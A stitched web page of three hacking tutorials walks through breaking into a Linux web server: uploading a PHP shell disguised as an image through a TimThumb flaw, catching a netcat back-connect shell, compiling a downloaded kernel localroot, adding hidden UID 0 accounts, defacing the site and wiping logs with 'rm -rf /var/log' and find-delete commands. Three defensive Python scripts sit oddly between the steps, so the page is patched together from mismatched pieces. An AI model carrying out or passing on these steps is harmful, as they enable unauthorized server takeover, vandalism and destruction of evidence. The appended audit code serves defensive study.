Server Rooting

How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]

Posted: 03/02/2012 in Hacking, Linux Hacking, Mac Hacking, Windows Hacking

Tutorial on Web Hacking by Akatzbreaker

Web hacking is a huge topic that I could easily discuss for hours.

I had the idea to expand our blog's topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc.) and add more hacking information, tutorials and so on.
So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server.
Everything you need to know….

Tools you need:

- Backtrack (Backtrack Website)
- Firefox (get it from here….) – Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack). If you are on another Linux environment get it from here….
- iCon2PHP (Get it from here….)
- A good shell (the iCon2PHP archive includes three great shells)
- A good VPN or Tor (more explanation below…..)
- Acunetix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net)

About the Tools:

Backtrack
– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here….
Netcat
– Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
– iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
– While hacking you need to be anonymous so that nobody can trace you (even if you forget to delete the logs….). VPN stands for Virtual Private Network, and what it does is hide your IP and encrypt the data you send to and receive from the Internet. A good VPN solution for Windows machines is ProXPN. However, with VPN connections (especially a free VPN connection) your connection speed is really slow. So, I wouldn't recommend a VPN unless you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle, Vidalia, which is a great tool for Windows, Mac and Linux that routes you through proxies all over its network around the world so as to keep you anonymous, changing these proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don't want to pay for a paid VPN account.
Apart from Tor, simple proxies are good, but I wouldn't recommend them as much as I would Tor.
If I listed the above options according to their reliability:
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
– Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

- - - Before we begin - - -

- Boot to Backtrack
- Connect to your VPN or to Tor.
- It would be good to read a complete guide on staying anonymous while hacking here…
- Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix (find a tutorial at Hackforums.net). Open it and scan the website (use the standard profile; don't modify anything unless you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)
Let's say we find a vulnerability where we can upload a remote file (our shell) and get access to the website's files.

The warning should be something like this. It can mention other information or be a completely different warning (like for SQL Injection; I will post a tutorial on this also…), depending on the vulnerability. What we need for this tutorial is that we can exploit the 'File Inclusion Attack' and get access to the website's files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now we have the site and the path where the vulnerability is. In our example let's say it is here:
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven't updated to the latest version of TimThumb, which is an image-editing service on websites.
OK. Acunetix should also mention the OS of the server. We'll assume that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don't need anything more from Acunetix.

2. Uploading the shell:

Until now, we know:
- The website's blog has a huge vulnerability in TimThumb.
- It is hosted on a Unix system.
Next, because the vulnerability is located in an outdated TimThumb version, and TimThumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don't care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP is located.
Run the Program and follow the in-program instructions to build the ‘finalImage.php’.
To avoid any errors while uploading, rename 'finalImage.php' to 'image.php;.png' (instead of png, type the format your image was: jpeg, jpg, gif….). This is exactly the same file, but it confuses the uploader into thinking that it actually is an image.
iCon2PHP Terminal Output:
[...]
Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php
Entered!
Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
Upload Output to a Server:
Next, upload your 'image.php;.png' to a free server (000webhost, 0fees etc….).
Go to the vulnerability and type in the URL:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like "flickr.com" (or another big image-hosting service) because sometimes it doesn't accept images from other websites.
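Both tricks in this section rely on sloppy input checks on the server side: a host check that matches "flickr.com" anywhere in the hostname, and an extension check that only looks at the last suffix of "image.php;.png". The following is an added example (not code from the tutorial or from TimThumb) that puts each weak check beside a hardened one; ALLOWED_HOSTS is an assumed allowlist standing in for whatever image hosts a resizer script would permit.

```python
# Added example (not from the tutorial): the two input checks that the tricks
# above rely on, each next to a hardened version. ALLOWED_HOSTS is an assumed
# allowlist standing in for the image hosts a resizer script would permit.
import os
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"flickr.com", "www.flickr.com"}
ALLOWED_EXTS = {".png", ".jpg", ".jpeg", ".gif"}

def weak_host_ok(url):
    """Substring match on the host: 'flickr.com.domain.0fees.net' passes."""
    host = urlsplit(url).hostname or ""
    return any(allowed in host for allowed in ALLOWED_HOSTS)

def strict_host_ok(url):
    """Exact match on the parsed hostname, http(s) only, no userinfo or port."""
    try:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or parts.username or parts.port:
            return False
    except ValueError:          # malformed port such as http://h:xyz/
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    return host in ALLOWED_HOSTS

def weak_ext_ok(name):
    """Only the last extension is inspected: 'image.php;.png' passes."""
    return os.path.splitext(name)[1].lower() in ALLOWED_EXTS

def strict_ext_ok(name):
    """One stem, one allowed extension, no path or separator characters."""
    if os.path.basename(name) != name or ";" in name or "\x00" in name:
        return False
    stem, ext = os.path.splitext(name)
    return bool(stem) and "." not in stem and ext.lower() in ALLOWED_EXTS

def check_remote_image(url):
    """Return the verdict of the weak pair and of the strict pair for one URL."""
    name = urlsplit(url).path.rsplit("/", 1)[-1]
    return {"weak": weak_host_ok(url) and weak_ext_ok(name),
            "strict": strict_host_ok(url) and strict_ext_ok(name)}

if __name__ == "__main__":
    # URL quoted in the tutorial above (the hostname is constructed, not real)
    print(check_remote_image("http://flickr.com.domain.0fees.net/image.php;.png"))
    print(check_remote_image("https://www.flickr.com/photo.jpg"))
```

The strict pair still lets a genuine flickr.com image through, which is the point: the fix is exact host matching and a single-extension rule, not blocking remote images outright.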
Website…. Shelled!
OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.

3. Root the Server:

Now that you have shelled the website we can start the process of rooting the server.
What is rooting when it comes to server hacking?
—> Rooting a server is the procedure in which the hacker acquires root privileges over the whole server. If you don't understand this yet, I reassure you that by the end of the section "Rooting a server" you will have understood exactly what it is…
Let's proceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:
Host: YourIPAddress Port: 402 (or the port you forwarded….)
8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you first have to compile it by typing: gcc exploit.c -o exploit ))
– Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!

4. Deface the Website:

What is defacing?
Defacing is the procedure in which the hacker uploads his own index webpage to replace the homepage of a site. In this way, he can boost his reputation or pass a message to the people or the company (which owns the website…).
Since you have the website shelled, you just create a nice hacky page in HTML and upload it via the shell as index.html (delete or rename the website's one…).

5. Cover your tracks:

Until now you were under the anonymity of Tor or ProXPN. You were very safe. However, to make sure that it will be impossible for the admin to locate you, we have to delete the logs.
First of all, Unix-based machines have some logs that you had better either edit or delete.
Common Linux log file names and their usage:
/var/log/message: General message and system related stuff
/var/log/auth.log: Authentication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all Linux logs file.
To delete all of them at once type:
su root1
rm -rf /var/log
mkdir /var/log

End of this Tutorial:

Server Rooting Tutorial

Hello guys, hope you all are doing great. Today I will explain how to root a Linux server with a localroot.

What is rooting?
Rooting is the process of exploiting the kernel to gain administrator (root) rights on servers.

Requirements:


  • Basic Unix/Linux command knowledge
  • Shell access on the targeted server
  • PHP webshell with backconnect option (Click Here to Download WSO 2.5 webshell)
  • A localroot exploit (Click Here to download localroot collection)
  • Netcat (Click Here to download)


  • Let's get started....

    [#] Backconnecting
    First of all you will need an open port on your router in order to backconnect. Information on port forwarding can be found HERE.
    Let's assume that you have an open port. Open your command prompt/terminal, cd to the netcat path and type:

    nc -vlp 1337

    where 1337 is the open port on your router. It should say:

    listening on [any] 1337 ...

    Now go to your webshell and navigate to the "BackConnect" option.
    The backconnect option is located under Network in the provided WSO webshell.
    Enter your open port and click "Connect".
    Now navigate back to your command prompt; if it says "sh: no job control in this shell" we have successfully backconnected to the server. The next step is to find an exploit for it.



    [#] Choosing a Localroot Exploit
    We will need a localroot exactly matching the kernel and the year it was built. The older the kernel, the better the chances of finding an exploit and rooting it. To check which kernel version it is using, execute the following:
    uname -rv

    It will give you something like:

    2.6.18-348.12.1.el5PAE #1 SMP Wed Jan 01 06:17:31 EDT 2013 i686 i686 i386 GNU/Linux

    Now choose a localroot matching the kernel and year from the localroot collection which I provided, or if you can't find it in the collection just google the kernel version.



    [#] Executing the Localroot Exploit
    Upload the localroot via the webshell, or if you have uploaded it somewhere else you can use the following command to download it to the server.
    wget http://www.site.com/localroot.c

    Now, if your exploit has a .c extension you will have to compile it; otherwise just skip to the next step. For compiling:

    gcc filename.c -o outputfilename

    If you get a permission denied error, compile it locally or on another box and upload it to the server.
    Giving full permissions to the file:

    chmod 0777 filename

    Finally executing the exploit:

    ./filename

    Now to check if you have got root execute the following:

    whoami

    If it says root you have successfully rooted the server. Next is to add a new user with root privileges.



    [#] Adding New User
    The following command adds a new user on the server named "r00t"; you can change this to whatever you like.
    adduser -g 0 r00t -G wheel,sys,bin,daemon,adm,disk -d /r00t -s /bin/sh

    Now give a password for the user r00t type:

    passwd r00t

    Enter a password, confirm it and it should say:

    passwd: all authentication tokens updated successfully.

    Now you will be able to login via putty or any ssh client.
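Both rooting walkthroughs on this page end the same way: the first adds a second UID 0 login with "adduser -u 0 -o ... root1", this one adds "r00t" with primary group 0 and membership in wheel, adm and friends. Either leaves a trace in /etc/passwd and /etc/group that an administrator can check for. This added script (not part of either tutorial) audits constructed snapshots of those two files for exactly those patterns.

```python
# Added example, not from either tutorial: audit /etc/passwd and /etc/group
# snapshots for the kind of account the "adduser -u 0 -o ... root1" and
# "adduser -g 0 r00t -G wheel,..." steps leave behind. Both samples are constructed.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
root1:x:0:0::/home/root1:/bin/bash
r00t:x:1001:0::/r00t:/bin/sh
"""
GROUP_SAMPLE = """\
root:x:0:
wheel:x:10:r00t
adm:x:4:r00t
users:x:100:
"""
PRIVILEGED_GROUPS = ("root", "wheel", "sudo", "adm")

def parse_passwd(text):
    """Yield (name, uid, gid, shell) for every well-formed passwd line."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        try:
            yield fields[0], int(fields[2]), int(fields[3]), fields[6]
        except ValueError:
            continue

def audit_passwd(text, known_root="root"):
    """Flag any login other than known_root that carries UID 0 or primary GID 0."""
    findings = []
    for name, uid, gid, shell in parse_passwd(text):
        if name == known_root:
            continue
        if uid == 0:
            findings.append(f"{name}: extra UID 0 account (shell {shell})")
        elif gid == 0:
            findings.append(f"{name}: primary group is GID 0 (root)")
    return findings

def privileged_group_members(text, groups=PRIVILEGED_GROUPS):
    """Map each privileged group to its supplementary members, if it has any."""
    members = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] in groups and fields[3]:
            members[fields[0]] = fields[3].split(",")
    return members

if __name__ == "__main__":
    print(audit_passwd(PASSWD_SAMPLE))
    print(privileged_group_members(GROUP_SAMPLE))
```

To run it against a live host, pass the contents of /etc/passwd and /etc/group instead of the samples; both files are world-readable on a normal system, so the check needs no privileges.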



    [#] Clearing Logs
    Now it's time to clear our logs. Execute the following:
    rm -rf /tmp/logs
    rm -rf $HISTFILE
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_history
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_logout
    rm -rf /usr/local/apache/logs
    rm -rf /usr/local/apache/log
    rm -rf /var/apache/logs
    rm -rf /var/apache/log
    rm -rf /var/run/utmp
    rm -rf /var/logs
    rm -rf /var/log
    rm -rf /var/adm
    rm -rf /etc/wtmp
    rm -rf /etc/utmp
    find / -name *.bash_history -exec rm -rf {} \;
    find / -name *.bash_logout -exec rm -rf {} \;
    find / -name "log*" -exec rm -rf {} \;
    find / -name *.log -exec rm -rf {} \;
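The log-wiping commands above (and the "rm -rf /var/log; mkdir /var/log" step in the first tutorial) only destroy the copy on the compromised host; logs forwarded to a remote collector survive. For the local copy, a baseline-and-diff check shows what went missing. This added script (not from either tutorial) builds a constructed fake log tree in a temp directory and then wipes it the way the tutorial does, so it runs without touching a real /var/log.

```python
# Added example, not from the tutorials: baseline-and-diff check reporting what
# the "rm -rf /var/log; mkdir /var/log" step destroys. demo() uses a constructed tree.
import os, shutil, tempfile

def snapshot(log_dir):
    """Map every regular file under log_dir (relative, '/'-separated) to its size."""
    baseline = {}
    for root, _, files in os.walk(log_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, log_dir).replace(os.sep, "/")
            baseline[rel] = os.path.getsize(path)
    return baseline

def audit_log_dir(log_dir, baseline):
    """Compare the directory against a baseline: missing or shrunken files are findings."""
    if not os.path.isdir(log_dir):
        return [f"{log_dir}: directory missing entirely"]
    current = snapshot(log_dir)
    findings = []
    for rel, size in sorted(baseline.items()):
        if rel not in current:
            findings.append(f"{rel}: deleted")
        elif current[rel] < size:
            findings.append(f"{rel}: shrank from {size} to {current[rel]} bytes")
    return findings

def demo():
    """Constructed scenario: take a baseline, then wipe and recreate like the tutorial."""
    tmp = tempfile.mkdtemp()
    log_dir = os.path.join(tmp, "var", "log")
    os.makedirs(os.path.join(log_dir, "httpd"))
    sample = {"auth.log": "Accepted password for www-data\n" * 3, "wtmp": "x" * 40,
              "httpd/access_log": "GET /blog/wp-content/themes/t/thumb.php\n"}
    for rel, body in sample.items():
        with open(os.path.join(log_dir, rel), "w") as fh:
            fh.write(body)
    baseline = snapshot(log_dir)
    shutil.rmtree(log_dir)          # the wipe
    os.makedirs(log_dir)            # the empty replacement directory
    with open(os.path.join(log_dir, "wtmp"), "w") as fh:
        fh.write("x" * 10)          # a file partially regenerated after the wipe
    try:
        return audit_log_dir(log_dir, baseline)
    finally:
        shutil.rmtree(tmp)

if __name__ == "__main__":
    print(demo())
```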

    That's All Guys!
    Note: Rooting a box you don't own is illegal; this information is for educational purposes only.
    Stay safe and good luck!
    What is Root?

    Root is the administrator of the whole server. If someone gets root access he can do anything with the server, like delete and copy anything on the server; he can deface all the home pages (mass deface).

    We can't talk about root on Windows. That's enough for beginners, because if I talked about root in full I would need another book. So, I guess now we know the importance of root access and why we try to get root.

    How to get Root?

    There are 3 ways to get ROOT on a server:
    1 – With a local root.
    2 – With SQL, by reading some important files for the root password.
    3 – With an exploit on software (Buffer Overflow).

    In this post, we will explain local root. I will explain the other ways soon in some other post.
    OK, let's get back to work.


    After uploading your shell on the server and getting the localroot, you do a back connect and run the localroot to get root. This is a small idea of how it works; in the next step you will see how to find a localroot and run it to get root access.

    How to Search for a Local root?

    First of all you need to know what version of the kernel is running.
    You can find that out from your shell; for example, this version is 2.6.18 - 2012


    Go to EXECUTE in your shell and write "uname -a". You will get the same result, by the way.

    Now, how to find the local root.

    You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc., which provide these local roots. One more thing to notice is that there exist two types of local roots:
    1. Local.C : which are not ready (must be compiled first).
    2. Local : ready to use.

    How to get Root access?

    First you need a shell with a Back Connect option like this:


    Enter your "Public IP Address" in SERVER, the port you want to connect on, leave it on Perl this time, and finally connect.

    Now you must receive the back connect with a tool named netcat; you can download it from the net. After that open your terminal if you are under Linux, or CMD if you are under Windows. I will explain only Linux; for Windows it's all the same.

    After that follow the steps:

    1 - Press nc -vlp 433
    2 - Wget [the link of the local-Root.zip]
    3 - unzip local-Root.zip
    4 - chmod 777 local.c
    5 - now change the local root from local.c to local:
    gcc local.c -o local (then you will find local.c transformed to local)
    6 - chmod 777 local
    7 - ./local to make the local root work
    8 - su
    then check your id: uid=0(root) gid=0(root) groups=0(root)

    Getting UID=0 means you have got root privileges and hence can do a variety of stuff on the remote server, say mass deface, dump databases, redirect sites, change content, etc.
